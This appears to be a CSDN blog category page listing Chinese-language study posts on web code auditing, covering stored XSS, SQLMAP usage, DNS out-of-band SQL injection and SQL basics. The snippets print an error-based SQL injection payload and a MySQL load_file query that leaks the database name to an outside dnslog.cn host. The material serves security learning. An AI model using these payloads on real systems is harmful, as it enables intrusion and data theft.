![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Audit
文章平均质量分 70
chérie
你所见即我 我不反驳
展开
-
【存储型XSS】
存储型XSS$input =$_GET['inout'];$code= <<<CODE <textarea>$input</textarea>CODE;原创 2021-03-05 18:52:46 · 688 阅读 · 1 评论 -
【SQLMAP】工具使用
SQLMAP的使用基础使用 -- h 帮助u [是 get的方式]id=1' AND (SELECT 8255 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8255=8255,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'npKc'='npKcr-缓存路径r多URL测试...原创 2021-03-02 10:57:18 · 171 阅读 · 0 评论 -
【DNS外带】
DNS_LOG外带 DNSLOG.cn(实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带)普通DNS外带http://dnslog.cn/select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc'))通过16进制编码DNS外带select load_file(concat('\\\\',(select substr..原创 2021-03-01 10:51:53 · 792 阅读 · 0 评论 -
【Audit_Code】SqlMap 01
SQL注入SQL是什么 结构化查询语言,structure query langage.什么是SQL注入SQL要有一个可利用的控制的参数点,这些参数传递给后台如何查看网页文件对应那个路径打印一点东西原创 2021-02-24 23:33:41 · 127 阅读 · 0 评论 -
【Audit_code 2 】代码审计
数据库服务器1.基础配置打开服务器PhpStudy, 打开数据库图形界面Navicate在数据库里注释的三种方法 -- /**/ #2.数据库复习Navicate F5刷新2.1.创建库UTF8 是有缺陷的,字符集不够完整。所以解决方案是 UTF8mb4.字符与字节的概念在ASCII(美国信息交换标准)码中,一个符号就是一个字符一个字节是8个比特位 0000 0000比特是储存在电脑里最小的单位create database if not exists te原创 2021-02-22 18:55:17 · 201 阅读 · 0 评论 -
【Audit_code】代码审计01
代码审计01 - 基本的web代码审计 - 对防火墙的认识 - WAF 绕过 - 反病毒anti-virus的绕过 - 学习如何写渗透报告基本的定义: CNVD - 国家安全的漏洞数据库(通用性的中危以上的漏洞 或者使敏感机关的中高危以上的事件) 黑盒 - 看不到源代码 (后端语言 php javascript) 白盒 - 可以看到相应的代码1.信息安全法律法规信息社区 : tools, 先知社区, 零组(资料文库)明确违法的边界,明确绝对不能做的事情明确在挖洞时候原创 2021-02-20 21:59:55 · 536 阅读 · 1 评论